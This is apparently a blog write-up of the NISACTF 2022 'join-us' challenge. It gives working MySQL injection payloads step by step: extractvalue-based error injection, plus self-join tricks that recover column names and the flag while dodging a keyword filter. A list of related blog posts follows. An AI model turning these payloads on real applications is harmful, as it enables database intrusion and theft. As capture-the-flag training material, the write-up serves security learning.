[NISACTF 2022]join-us - 报错注入&无列名注入

点击登录,找到注入点

这种框,可以直接爆破关键字,看是否拦截,也可以手动尝试,发现=、union、and、or、substr、database等关键字都拦截了

1、学到了:可以用数据库中不存在的表名或者不存在的自定义函数名爆出数据库名,1'-a()#1' || (select * from aa)#

FUNCTION sqlsql.a does not exist

2、直接甩一个报错注入上去,extractvalue(0,concat(0x7e,1,0x7e));#

没拦截,说明可以试一下

3、1' || extractvalue(0,concat(0x7e,1,0x7e));#

XPATH syntax error: '~ 1 ~',说明报错成功了

4、1' || extractvalue(0,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql'),1,30),0x7e));#

XPATH syntax error: '~ Fal_flag,output ~'

5、1' || extractvalue(0,concat(0x7e,mid((select group_concat(column_name) from Fal_flag),1,100),0x7e));#

不要耍小心思喔~ ------ column被waf,无列名注入

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag as a join Fal_flag as b)as c),1,100),0x7e));#

不要耍小心思喔~ ------ as被waf,去掉as

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b) c),1,100),0x7e));#

Duplicate column name 'id'

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b using(id)) c),1,100),0x7e));#

Duplicate column name 'data'

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b using(id,data)) c),1,100),0x7e));#

Duplicate column name 'i_tell_u_this_is_Fal(se)_flag_is_in_another' ------ flag在另一个表(output)

6、1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b) c),1,100),0x7e));#

Duplicate column name 'data'

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b using(data)) c),1,100),0x7e));#

XPATH syntax error: '~ NSSCTF{77a4667a-b16e-46a6-87...'

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b using(data)) c),20,100),0x7e));#

XPATH syntax error: '~ e-46a6-87fc-f981f48eeb5c} ~'

相关推荐
gwcgwcjava1 分钟前
[时序数据库-iotdb]时序数据库iotdb的安装部署
数据库·时序数据库·iotdb
SHUIPING_YANG15 分钟前
根据用户id自动切换表查询
java·服务器·数据库
爱吃烤鸡翅的酸菜鱼28 分钟前
IDEA高效开发:Database Navigator插件安装与核心使用指南
java·开发语言·数据库·编辑器·intellij-idea·database
超奇电子32 分钟前
阿里云OSS预签名URL上传与临时凭证上传的技术对比分析
数据库·阿里云·云计算
modelmd38 分钟前
mysql not in 查询引发的bug问题记录
sql·mysql
神仙别闹1 小时前
基于C#+SQL Server实现(Web)学生选课管理系统
前端·数据库·c#
枷锁—sha1 小时前
【DVWA系列】——CSRF——Medium详细教程
android·服务器·前端·web安全·网络安全·csrf
枷锁—sha1 小时前
跨站请求伪造漏洞(CSRF)详解
运维·服务器·前端·web安全·网络安全·csrf
m0_653031361 小时前
PostgreSQL技术大讲堂 - 第97讲:PG数据库编码和区域(locale)答疑解惑
数据库·postgresql
会编程的林俊杰1 小时前
MySQL中的锁有哪些
数据库·mysql